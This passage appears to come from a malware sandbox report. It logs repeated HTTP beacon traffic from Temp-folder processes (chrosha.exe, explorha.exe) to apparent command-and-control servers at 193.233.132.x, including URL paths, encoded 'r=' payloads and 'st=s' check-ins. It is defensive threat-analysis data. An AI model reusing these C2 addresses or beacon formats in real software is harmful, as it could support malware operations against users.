                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:38.521471024 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
797 | 192.168.2.5 | 50645 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:38.434638023 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:38.688963890 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:38 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
798 | 192.168.2.5 | 50646 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:38.884622097 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:33:39.131378889 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
799 | 192.168.2.5 | 50647 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:39.062916994 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:33:39.311497927 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
800 | 192.168.2.5 | 50648 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:39.380281925 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:39.629511118 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
801 | 192.168.2.5 | 50649 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:39.563229084 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 156
Cache-Control: no-cache
Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:39.814528942 CEST | 196 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:39 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
802 | 192.168.2.5 | 50650 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:39.992706060 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:33:40.239696980 CEST | 219 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
803 | 192.168.2.5 | 50651 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:40.177026987 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.167
Content-Length: 4
Cache-Control: no-cache
Data Raw: 73 74 3d 73
Data Ascii: st=s
Apr 19, 2024 03:33:40.421053886 CEST | 197 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 19 Apr 2024 01:33:40 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
804 | 192.168.2.5 | 50652 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:40.490765095 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 193.233.132.56
Content-Length: 156
Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:40.740268946 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
805 | 192.168.2.5 | 50653 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:40.669392109 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:40.919905901 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:40 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
806 | 192.168.2.5 | 50654 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:41.103409052 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:41.343666077 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
807 | 192.168.2.5 | 50655 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:41.274914980 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:41.519941092 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
808 | 192.168.2.5 | 50656 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:41.592413902 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:41.840955973 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
809 | 192.168.2.5 | 50657 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:41.775398970 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:42.031157017 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:41 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
810 | 192.168.2.5 | 50658 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:42.198170900 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:42.444777012 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
811 | 192.168.2.5 | 50659 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:42.388545036 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:42.640345097 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
812 | 192.168.2.5 | 50660 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:42.694914103 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:33:42.943171978 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:42 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
813 | 192.168.2.5 | 50661 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:42.892180920 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:33:43.145361900 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
814 | 192.168.2.5 | 50662 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:43.302375078 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:43.546168089 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
815 | 192.168.2.5 | 50663 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:43.518923998 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:33:43.767930031 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:43 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
816 | 192.168.2.5 | 50664 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:33:43.791470051 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
